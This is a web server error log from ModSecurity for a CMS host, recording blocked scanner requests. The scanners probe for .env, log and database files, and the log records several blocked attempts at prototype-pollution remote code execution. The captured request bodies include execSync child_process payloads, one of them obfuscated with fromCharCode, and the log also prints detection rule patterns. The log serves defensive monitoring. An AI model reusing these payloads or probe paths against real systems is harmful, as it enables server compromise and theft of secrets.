"OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/app/logs/dev.log"] [unique_id "aTPzuusuS7TwaJcc3vHz7QAAAMU"] [Sat Dec 06 11:13:30.998131 2025] [:error] [pid 28201:tid 28229] [client 16.146.2.134:47820] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/app/logs/prod.log"] [unique_id "aTPzugaaBQA8K9Y2IUPb9QAAABc"] [Sat Dec 06 11:13:31.611369 2025] [:error] [pid 28201:tid 28224] [client 16.146.2.134:47826] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/Thumbs.db"] [unique_id "aTPzuwaaBQA8K9Y2IUPb9gAAABI"] [Wed Dec 10 00:20:26.726963 2025] [:error] [pid 10047:tid 10071] [client 45.148.10.23:22202] [client 45.148.10.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/logs/debug.log"] [unique_id "aTigqm-neFT78GCR9wgI1wAAANU"] [Wed Dec 10 00:20:26.937629 2025] [:error] [pid 8901:tid 8998] [client 45.148.10.23:22218] [client 45.148.10.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/debug.log"] [unique_id "aTigqoPZrqwqhQFTx1EvjQAAAIE"] [Wed Dec 10 00:20:26.985050 2025] [:error] [pid 12415:tid 12441] [client 45.148.10.23:22222] [client 45.148.10.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/logs/error.log"] [unique_id "aTigqiehfogz7atDeBBh6gAAAQo"] [Wed Dec 10 00:20:27.028145 2025] [:error] [pid 12415:tid 12447] [client 45.148.10.23:22226] [client 45.148.10.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/laravel.log"] [unique_id "aTigqyehfogz7atDeBBh6wAAARA"] [Wed Dec 10 00:20:27.068715 2025] [:error] [pid 12415:tid 12448] [client 45.148.10.23:22228] [client 45.148.10.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/logs/debug.log"] [unique_id "aTigqyehfogz7atDeBBh7AAAARE"] [Wed Dec 10 00:20:27.109780 2025] [:error] [pid 8901:tid 9029] [client 45.148.10.23:22238] [client 45.148.10.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aTigq4PZrqwqhQFTx1EvjgAAAJE"] [Wed Dec 10 00:20:27.164564 2025] [:error] [pid 8901:tid 9002] [client 45.148.10.23:22240] [client 45.148.10.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/wp-content/debug.log"] [unique_id "aTigq4PZrqwqhQFTx1EvjwAAAIM"] [Wed Dec 10 01:38:35.847359 2025] [:error] [pid 8900:tid 8993] [client 43.207.175.198:48588] [client 43.207.175.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms.dev-unit.com"] [uri "/apps"] [unique_id "aTiy-4fTNommSAYzc_YuWgAAAEc"] [Wed Dec 10 03:58:29.030060 2025] [:error] [pid 3655:tid 3659] [client 44.222.79.145:42906] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/.env"] [unique_id "aTjTxaNexQYgxDKgoqtRegAAAMI"] [Wed Dec 10 12:22:42.705465 2025] [:error] [pid 8150:tid 8179] [client 172.190.142.176:39276] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Thu Dec 11 04:18:14.373716 2025] [:error] [pid 5581:tid 5607] [client 44.222.79.145:51472] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/.env"] [unique_id "aTop5kz8J_6v__pKu_PfpAAAANg"] [Thu Dec 11 04:18:14.468810 2025] [:error] [pid 5581:tid 5588] [client 44.222.79.145:51472] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/app/.env"] [unique_id "aTop5kz8J_6v__pKu_PfpQAAAMU"] [Thu Dec 11 04:18:14.559648 2025] [:error] [pid 5581:tid 5592] [client 44.222.79.145:51472] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/config/.env"] [unique_id "aTop5kz8J_6v__pKu_PfpwAAAMk"] [Thu Dec 11 04:18:14.660813 2025] [:error] [pid 5581:tid 5589] [client 44.222.79.145:51472] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/api/.env"] [unique_id "aTop5kz8J_6v__pKu_PfqAAAAMY"] [Thu Dec 11 04:18:14.755790 2025] [:error] [pid 5581:tid 5604] [client 44.222.79.145:51472] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/admin/.env"] [unique_id "aTop5kz8J_6v__pKu_PfqQAAANU"] [Thu Dec 11 04:18:14.844436 2025] [:error] [pid 5581:tid 5603] [client 44.222.79.145:51472] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/backend/.env"] [unique_id "aTop5kz8J_6v__pKu_PfqgAAANQ"] [Thu Dec 11 04:18:14.935305 2025] [:error] [pid 5581:tid 5593] [client 44.222.79.145:51472] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/frontend/.env"] [unique_id "aTop5kz8J_6v__pKu_PfqwAAAMo"] [Thu Dec 11 14:58:49.506154 2025] [:error] [pid 5424:tid 5502] [client 130.33.46.121:8168] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Thu Dec 11 15:00:22.499262 2025] [:error] [pid 5429:tid 5531] [client 130.33.46.121:14274] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-login.php [Fri Dec 12 00:28:16.833475 2025] [:error] [pid 5424:tid 5502] [client 46.101.119.189:41072] [client 46.101.119.189] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\((?:\\\\W*?(?:objectc(?:ategory|lass)|homedirectory|[gu]idnumber|cn)\\\\b\\\\W*?=|[^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|][^\\\\w\\\\x80-\\\\xFF]*?\\\\()|\\\\)[^\\\\w\\\\x80-\\\\xFF]*?\\\\([^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|])" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "65"] [id "950010"] [rev "2"] [msg "LDAP Injection Attack"] [data "Matched Data: )() | found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$b0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[string.fromcharcode(109,97,105,110,77,111,100,117,108,101)][string.fromcharcode(114,101,113,117,105,114,101)]; } catch(e) {} if (!req) { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [ [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aTtFgCXyTIYstocRFEFbYwAAAEk"]